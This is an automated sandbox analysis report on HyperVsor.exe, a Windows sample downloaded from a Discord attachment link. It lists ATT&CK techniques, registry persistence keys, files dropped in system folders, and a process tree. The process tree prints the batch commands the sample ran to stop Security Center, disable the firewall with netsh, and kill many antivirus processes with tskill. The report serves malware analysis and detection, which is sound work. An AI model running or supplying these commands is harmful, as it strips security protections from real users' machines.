hxxps://cdn[.]discordapp[.]com/attachments/1287139168547242014/1287141820333035662/HyperVsor[.]exe?ex=66f077bb&is=66ef263b&hm=1964c0e9cff3cf049f0ac533d6619094b4a6cd43ecfe37816e6a3ea2ed063c9f&

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
21/09/2024, 20:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1287139168547242014/1287141820333035662/HyperVsor.exe?ex=66f077bb&is=66ef263b&hm=1964c0e9cff3cf049f0ac533d6619094b4a6cd43ecfe37816e6a3ea2ed063c9f&

Score

8^/10

defense_evasion discovery evasion persistence privilege_escalation

Malware Config

Signatures

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1116	netsh.exe
584	netsh.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	HyperVsor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	HyperVsor.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\executor.bat	cmd.exe
File opened for modification	C:\Windows\SysWOW64\executor.bat	cmd.exe
File created	C:\Windows\System32\executor.bat	cmd.exe
File opened for modification	C:\Windows\System32\executor.bat	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\assembly\GAC_32\mscorlib\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\58e7bce688f65bfab53cf7a79caed0c8\executor.bat	cmd.exe
File created	C:\Windows\Boot\EFI\hr-HR\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\IIEHost\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\executor.bat	cmd.exe
File created	C:\Windows\assembly\GAC_MSIL\System.Web.Extensions\3.5.0.0__31bf3856ad364e35\System.Web.Extensions.dll	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\f7a76d6905b616bf9f01d945e845a868\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll.aux	cmd.exe
File opened for modification	C:\Windows\Boot\EFI\fi-FI\bootmgr.efi.mui	cmd.exe
File opened for modification	C:\Windows\appcompat\appraiser\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\System.Workflow.Runtime\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\8611e1ca8eea075bbaf1d33391d1d430\Microsoft.PowerShell.Workflow.ServiceCore.ni.dll.aux	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC\mscomctl\10.0.4504.0__31bf3856ad364e35\__AssemblyInfo__.ini	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.Resources.dll	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\267eb7759c2a15af4a62325885a2f7d8\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll.aux	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\executor.bat	cmd.exe
File opened for modification	C:\Windows\apppatch\msimain.sdb	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\e367ec4c841d7b47849f61295dbc0785\executor.bat	cmd.exe
File created	C:\Windows\security\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll	cmd.exe
File created	C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\normidna.nlp	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Policy.11.0.Microsoft.Office.Interop.SmartTag\15.0.0.0__71e9bce111e9429c\Policy.11.0.Microsoft.Office.Interop.SmartTag.dll	cmd.exe
File created	C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\executor.bat	cmd.exe
File created	C:\Windows\assembly\GAC_32\System.Web\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\d4f19732fe9bd2b76e33deb637782965\Microsoft.WSMan.Management.ni.dll	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\85c96b5744ee713ee7c4580233b329e6\executor.bat	cmd.exe
File created	C:\Windows\Help\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\54676cbe4fa9daed03de8ad8b65d7bb6\executor.bat	cmd.exe
File created	C:\Windows\Boot\EFI\kd_02_14e4.dll	cmd.exe
File opened for modification	C:\Windows\AppReadiness\executor.bat	cmd.exe
File created	C:\Windows\assembly\GAC\mscomctl\10.0.4504.0__31bf3856ad364e35\executor.bat	cmd.exe
File created	C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\eb12b0c1a56f3957653cc70c3473b105\executor.bat	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\ddee512512f3ec2565e0ad470f0f96e2\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\37f752fa0f0436bb445cac49fb118e3f\executor.bat	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\executor.bat	cmd.exe
File created	C:\Windows\HelpPane.exe	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config	cmd.exe
File created	C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Office.Runtime.v10.0\executor.bat	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\b83fdfd330270c8f9decaf568309de0a\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_64\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\dc62687d17223015cbeb4fbe5d7785f5\Microsoft.Windows.Diagnosis.SDEngine.ni.dll	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\eb12b0c1a56f3957653cc70c3473b105\Microsoft.WSMan.Runtime.ni.dll.aux	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\normnfkc.nlp	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Policy.11.0.Microsoft.Office.Interop.SmartTag\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Applications.Hosting.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualStudio.Tools.Applications.Hosting.v9.0.dll	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Office.Word.AddInProxy.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualStudio.Tools.Office.Word.AddInProxy.v9.0.dll	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\System.Data.Linq\3.5.0.0__b77a5c561934e089\System.Data.Linq.dll	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\executor.bat	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\419f10c34818acaf4f59646a2e5a18a6\executor.bat	cmd.exe
File opened for modification	C:\Windows\regedit.exe	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Accessibility\2.0.0.0__b03f5f7f11d50a3a\Accessibility.dll	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0\9.0.0.0__b03f5f7f11d50a3a\executor.bat	cmd.exe
File opened for modification	C:\Windows\assembly\GAC_MSIL\Policy.11.0.Microsoft.Office.Interop.Word\15.0.0.0__71e9bce111e9429c\Policy.11.0.Microsoft.Office.Interop.Word.config	cmd.exe
File created	C:\Windows\assembly\NativeImages_v4.0.30319_64\SrpUxSnapIn\dc9fa510e8f8028ab4ccf87f7283ddec\executor.bat	cmd.exe
File opened for modification	C:\Windows\explorer.exe	cmd.exe
File created	C:\Windows\assembly\GAC_MSIL\MMCFxCommon\executor.bat	cmd.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\HyperVsor.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 952083.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\HyperVsor.exe:Zone.Identifier	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4476	msedge.exe
4476	msedge.exe
3004	msedge.exe
3004	msedge.exe
5004	msedge.exe
5004	msedge.exe
1116	msedge.exe
1116	msedge.exe
1816	identity_helper.exe
1816	identity_helper.exe
4992	tskill.exe
4992	tskill.exe
2144	tskill.exe
2144	tskill.exe
228	tskill.exe
228	tskill.exe
4108	tskill.exe
4108	tskill.exe
1644	tskill.exe
1644	tskill.exe
976	tskill.exe
976	tskill.exe
4132	tskill.exe
4132	tskill.exe
4920	tskill.exe
4920	tskill.exe
3192	tskill.exe
3192	tskill.exe
1940	tskill.exe
1940	tskill.exe
2200	tskill.exe
2200	tskill.exe
4284	tskill.exe
4284	tskill.exe
2276	tskill.exe
2276	tskill.exe
3288	tskill.exe
3288	tskill.exe
2348	tskill.exe
2348	tskill.exe
792	tskill.exe
792	tskill.exe
3960	tskill.exe
3960	tskill.exe
4120	tskill.exe
4120	tskill.exe
888	tskill.exe
888	tskill.exe
3084	tskill.exe
3084	tskill.exe
1900	tskill.exe
1900	tskill.exe
2164	tskill.exe
2164	tskill.exe
3916	tskill.exe
3916	tskill.exe
2312	tskill.exe
2312	tskill.exe
4280	tskill.exe
4280	tskill.exe
788	tskill.exe
788	tskill.exe
804	tskill.exe
804	tskill.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3004 wrote to memory of 1444	3004	msedge.exe	78
PID 3004 wrote to memory of 1444	3004	msedge.exe	78
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4804	3004	msedge.exe	79
PID 3004 wrote to memory of 4476	3004	msedge.exe	80
PID 3004 wrote to memory of 4476	3004	msedge.exe	80
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81
PID 3004 wrote to memory of 3836	3004	msedge.exe	81

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1287139168547242014/1287141820333035662/HyperVsor.exe?ex=66f077bb&is=66ef263b&hm=1964c0e9cff3cf049f0ac533d6619094b4a6cd43ecfe37816e6a3ea2ed063c9f&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffefa483cb8,0x7ffefa483cc8,0x7ffefa483cd8
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
  2⤵
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5376 /prefetch:8
  2⤵
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1116
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,9684190353809237427,2352188335096041160,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
  2⤵
  PID:4732

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:236

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2052

C:\Users\Admin\Desktop\HyperVsor.exe
"C:\Users\Admin\Desktop\HyperVsor.exe"
1⤵
- Adds Run key to start application
PID:4864
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c "executor.bat"
  2⤵
  PID:1224
- - C:\Windows\system32\net.exe
    net stop "Security Center"
    3⤵
    PID:960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Security Center"
      4⤵
      PID:584
- - C:\Windows\system32\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1116
- - C:\Windows\system32\tskill.exe
    tskill /A av*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4992
- - C:\Windows\system32\tskill.exe
    tskill /A fire*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2144
- - C:\Windows\system32\tskill.exe
    tskill /A anti*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:228
- - C:\Windows\system32\tskill.exe
    tskill /A spy*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4108
- - C:\Windows\system32\tskill.exe
    tskill /A bullguard
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1644
- - C:\Windows\system32\tskill.exe
    tskill /A PersFw
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:976
- - C:\Windows\system32\tskill.exe
    tskill /A KAV*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4132
- - C:\Windows\system32\tskill.exe
    tskill /A ZONEALARM
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4920
- - C:\Windows\system32\tskill.exe
    tskill /A SAFEWEB
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3192
- - C:\Windows\system32\tskill.exe
    tskill /A OUTPOST
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1940
- - C:\Windows\system32\tskill.exe
    tskill /A nv*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2200
- - C:\Windows\system32\tskill.exe
    tskill /A nav*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4284
- - C:\Windows\system32\tskill.exe
    tskill /A F-*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2276
- - C:\Windows\system32\tskill.exe
    tskill /A ESAFE
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3288
- - C:\Windows\system32\tskill.exe
    tskill /A cle
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2348
- - C:\Windows\system32\tskill.exe
    tskill /A BLACKICE
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:792
- - C:\Windows\system32\tskill.exe
    tskill /A def*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3960
- - C:\Windows\system32\tskill.exe
    tskill /A kav
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4120
- - C:\Windows\system32\tskill.exe
    tskill /A kav*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:888
- - C:\Windows\system32\tskill.exe
    tskill /A avg*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3084
- - C:\Windows\system32\tskill.exe
    tskill /A ash*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1900
- - C:\Windows\system32\tskill.exe
    tskill /A aswupdsv
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2164
- - C:\Windows\system32\tskill.exe
    tskill /A ewid*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3916
- - C:\Windows\system32\tskill.exe
    tskill /A guard*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2312
- - C:\Windows\system32\tskill.exe
    tskill /A guar*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4280
